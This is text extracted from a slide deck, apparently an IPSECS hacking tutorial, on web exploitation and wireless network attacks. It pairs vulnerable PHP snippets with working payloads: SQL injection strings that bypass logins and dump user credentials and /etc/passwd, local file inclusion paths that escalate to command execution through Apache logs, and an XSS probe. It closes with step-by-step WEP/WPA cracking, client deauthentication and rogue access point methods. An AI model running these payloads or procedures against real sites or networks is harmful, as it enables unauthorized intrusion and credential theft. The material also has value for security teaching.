5. IPSECS
Web Exploitation
• It's exploiting web application programming
flaws.
• Programming mistakes are always happen.
• Targeting clients or servers.
• Possible to steal databases and other sensitif
informations, steal cookie or session, execute
arbitrary commands, or fully compromise the
system.
• It's easy to do. Google helps you :).
www.ipsecs.com
6. IPSECS
Common Web Exploitation
• SQL Injection, an attack which's targeting
sensitive information in database server.
Possible to compromise system.
• File Inclussion, an attack which usually to gain
shell access on the remote target.
– Local file inclussion
– Remote file inclussion
• Cross Site Scripting (XSS), an attack which
targeting user or client of vulnerable website.
– Doom
– Persistent
– Non-persistent
www.ipsecs.com
8. IPSECS
SQL Injection
• Injecting malicious SQL query to take profits.
• Usually is used to bypass login, steal sensitive
information on database. Further attack can be
used in fully compromising system.
• User input is not well validated or no sanitation
process.
• All examples and demos bellow are in
PHP MySQL.
www.ipsecs.com
9. IPSECS
SQL Injection in login form
• User input in login form is not validated before to
be executed in database.
• Attacker is possible to send arbitrary SQL query
through login form and bypassing login process.
• Attacker can also execute other SQL query.
www.ipsecs.com
10. IPSECS
Vulnerable Code
• Example vulnerable code in login process:
$pass = md5($_POST['password']);
$query = "SELECT * FROM tblUser WHERE username = '" .
$_POST['username'] . "' AND password = '" . $pass . "'";
$q = mysql_query($query);
• Username which's sent from login form is not
validated.
www.ipsecs.com
11. IPSECS
Exploit Login
• Exploit code:
username = admin' OR 'a'='a
password = terserah
• SQL query to be executed by database server is:
SELECT * FROM tblUser WHERE username = 'admin' OR 'a'='a'
AND password = 'e00b29d5b34c3f78df09d45921c9ec47'
www.ipsecs.com
12. IPSECS
SQL Injection in login form
www.ipsecs.com
13. IPSECS
SQL Logic
• AND operator is executed before OR, result of
query is:
'a'='a' AND password = 'e00b29d5b34c3f78df09d45921c9ec47'
• Boolean logic result is FALSE, then:
username = 'admin' OR FALSE
• Boolean logic result is TRUE (admin).
• Attacker successfully bypassing login form.
www.ipsecs.com
14. IPSECS
SQL Injection in URI parameter
• Parameter input in URI is not validated before to
be executed in database.
• Attacker is possible to send arbitrary SQL query
by modifying parameter input.
www.ipsecs.com
15. IPSECS
Vulnerable Code
• Example vulnerable code while inputing URI
parameters:
$query = "SELECT * FROM news WHERE id=" . $_GET['aid'] ;
$q = mysql_query($query);
• Parameter 'aid' which's taken from URI is not
validated.
www.ipsecs.com
16. IPSECS
Exploiting SQL Injection
• Checking vulnerability using AND logic
http://example.com/news.php?aid=1 AND 1=1--
http://example.com/news.php?aid=1 AND 1=0--
• Knowing number of field using UNION SELECT
http://example.com/news.php?aid=1 UNION SELECT 1--
http://example.com/news.php?aid=1 UNION SELECT 1,2--
http://example.com/news.php?aid=1 UNION SELECT 1,2,3,..,n--
www.ipsecs.com
18. IPSECS
SQL Injection in URI parameter
• In Case table which generates “news”
contains 3 fields
www.ipsecs.com
19. IPSECS
Exploiting SQL Injection
• Knowing tables in database
http://example.com/news.php?aid=-1 UNION SELECT
1,2,GROUP_CONCAT(table_name) FROM
information_schema.tables WHERE table_schema=database()--
• Knowing fields in table 'tblUser'
http://example.com/news.php?aid=-1 UNION SELECT
1,2,GROUP_CONCAT(column_name) FROM
information_schema.columns WHERE table_name='tblUser'--
OR IN HEXAL
http://example.com/news.php?aid=-1 UNION SELECT
1,2,GROUP_CONCAT(column_name) FROM
information_schema.columns WHERE
table_name=0x74626c55736572--
www.ipsecs.com
21. IPSECS
Exploiting SQL Injection
• Viewing information in tables
http://example.com/news.php?aid=-1 UNION SELECT
1,2,CONCAT_WS(0x2c,username,password,namaLengkap)
FROM tblUser--
• Viewing arbitrary files (if FILE access is granted)
http://example.com/news.php?aid=-1 UNION SELECT
1,2,LOAD_FILE('/etc/passwd')--
OR IN HEXAL
http://example.com/news.php?aid=-1 UNION SELECT
1,2,LOAD_FILE(0x2f6574632f706173737764)--
www.ipsecs.com
24. IPSECS
File Inclussion
• Including malicious or sensitive file to be
executed by server.
• Usually is used to steal sensitive information,
execute arbitrary command, or compromise
system.
• User input is not well validated or no sanitation
process.
• All examples and demos bellow are in
PHP MySQL.
www.ipsecs.com
25. IPSECS
Local File Inclussion
• Including sensitive file in local server (vulnerable
server) to be executed by server.
• Usually is used to steal sensitive information,
execute arbitrary command. Further attack can
be used in fully compromising system.
• User input is not well validated or no sanitation
process.
www.ipsecs.com
26. IPSECS
Vulnerable Code
• Example vulnerable code:
define('DOCROOT', '/var/www/html/modules');
$filename = DOCROOT . "/" . $_GET['module'] . ".php";
include($filename);
• Parameter 'module' which's taken from URI is
not validated.
www.ipsecs.com
27. IPSECS
Viewing Sensitive Files
• Exploit code to viewing sensitive files on
vulnerable system:
http://example.com/index.php?module=../../../../../../../etc/passwd%00
http://example.com/index.php?module=../../../../../../../etc/group%00
www.ipsecs.com
31. IPSECS
Executing Command
• Executing command via access_log apache (in
case apache log is readable)
http://example.com/index.php?
module=../../../../../../../usr/local/apache/logs/access_log
%00&cmd=uname -a
http://example.com/index.php?
module=../../../../../../../usr/local/apache/logs/access_log
%00&cmd=id
www.ipsecs.com
33. IPSECS
Remote File Inclussion
• Including sensitive file in remote server (attacker
server) to be executed by server.
• Usually to execute arbitrary command using web
shell. Further attack can be used in fully
compormising system.
• User input is not well validated or no sanitation
process.
www.ipsecs.com
34. IPSECS
Vulnerable Code
• Example vulnerable code:
$filename = $_GET['page'] . ".php";
include($filename);
• Parameter 'page' which's taken from URI is not
validated.
www.ipsecs.com
41. IPSECS
Cross Site Scripting
• Inserting HTML/java script code to be executed
by client browser which views vulnerable
website.
• Usually is used in stealing cookie on computer
client, phising, and tricking user to download
arbitrary file.
• User input is not well validated or no sanitation
process.
• All examples and demos bellow are in
PHP MySQL.
www.ipsecs.com
42. IPSECS
Cross Site Scripting
• Doom based XSS, XSS in vulnerable file which
comes from default installed software.
• Non-Persistent XSS, XSS in vulnerable web
page which can be exploited by tricking user to
click malicious URI. Characteristic : temporal.
• Persistent XSS, XSS in vulnerable web page
which can be exploited to insert malicious code
to database. Characteristic : permanent.
www.ipsecs.com
43. IPSECS
Vulnerable Code
• Example vulnerable code:
echo "<pre> Searching for ". $_GET['key'] . "...</pre><br/>n";
• Parameter 'key' which's sent from search form is
not validated.
www.ipsecs.com
44. IPSECS
Cross Site Scripting
• Checking if XSS vulnerable:
http://example.com/search.php?key=<script>alert('XSS found
dude!')</script>
www.ipsecs.com
52. IPSECS
Wireless Network
• Now, is widely used in campus, government,
company, and many public places.
• Provide network for mobile devices.
• More flexible than wired network.
• More insecure than wired network, so here we
go!
www.ipsecs.com
53. IPSECS
War Driving
• Activity to search Wi-Fi wireless network.
• Public tools to do War Driving
– Windows : NetStumbler, Wireshark
– Linux : Kismet, AirCrack-ng, AirSnort, Wireshark
– OSX : KisMac
• I'm using Linux Ubuntu 8.10.
www.ipsecs.com
54. IPSECS
Kismet
• Console based 802.11 wireless network detector
and sniffer.
• It identifies wireless network by pasively sniffing.
• It's already exist on Ubuntu Repository or you
can download from www.kismetwireless.net.
• Use 'apt-get install kismet' on Ubuntu, read the
README if you want to install from source.
www.ipsecs.com
58. IPSECS
AirSnort
• GUI based 802.11 wireless network detector.
• Designed for WEP Cracker.
• It isn't ready on my Ubuntu repository, download
from www.sourceforge.net.
• Read the README to install.
www.ipsecs.com
59. IPSECS
aircrack-ng (formerly : aircrack)
• Console based 802.11 wireless network
detector.
• Designed for WEP & WPA-PSK Cracker.
• It's already exist on Ubuntu repository or you can
downlod from www.aircrack-ng.org.
• Use 'apt-get install aircrack-ng' on Ubuntu, read
the README if you want to install from source.
www.ipsecs.com
61. IPSECS
Wireshark
• GUI based network protocol analyzer for UNIX
and Windows.
• The most complete protocol analyzer which
support many data communication protocols.
• It's already exist on Ubuntu repository or you can
download from www.wireshark.org.
• Use 'apt-get install wireshark' on Ubuntu,read the
README if you want to install from source.
www.ipsecs.com
63. IPSECS
NetStumbler
• Best known windows tool to find wireless
networks.
• It is function like Kismet on linux or KisMac on
OSX.
• You can download NetStumbler in
www.netstumbler.com
• Since I use ubuntu, there's no demo for this tool.
www.ipsecs.com
66. IPSECS
Exploiting Wireless Network
• Miss Configuration (Human Error)
• Spoofing
• Cracking Protection
• Denial of Service
www.ipsecs.com
67. IPSECS
Miss Configuration
• Default Configuration on Device (Access Point)
• Default Username & Password
• Default Range IP Address
• SNMP public & private community
• No encryption enabled
www.ipsecs.com
68. IPSECS
Spoofing & Rogue AP
• Spoofing MAC address to bypass MAC filtering.
• Tools
– Linux : ifconfig
– Windows : smac, regedit
• Creating Rogue AP to trick wireless user, then
doing Man in The Middle and sniffing.
• Tools
– airsnarf http://airsnarf.shmoo.com
www.ipsecs.com
70. IPSECS
WEP Cracking
• WEP is based on RC4 algorithm and CRC32.
• Collecting as much as possible weak IV
(Insialization Vector) to be used in FMS attack.
• Accelerated collecting IV using traffic injection.
• Tools : aircrack-ng, AirSnort
www.ipsecs.com
71. IPSECS
WEP Cracking
• Start interface on Monitor mode.
• Run kismet to find AP target.
• Find AP with connected clients on it. Or do fake
authentication to associate with AP if no client
connected.
• Inject packet using aireplay-ng
• Dump packet using airodump-ng
• Crack dumped file using aircrack-ng
www.ipsecs.com
74. IPSECS
WPA Cracking
• WPA is based on RC4 algorithm + TKIP/AES
• WPA-PSK can be attack using dictionary attack.
• Of course, it needs dictionary
• Can be cracked when offline
• Tools : aircrack-ng
www.ipsecs.com
75. IPSECS
WPA Cracking
• Start interface on Monitor mode.
• Run kismet to find AP target.
• Find AP with which,s protected by WPA.
• Dump packet using airodump-ng
• Wait for a client to authenticate to AP, or
deauthenticate client which's connected to AP.
• Crack dumped file using aircrack-ng
www.ipsecs.com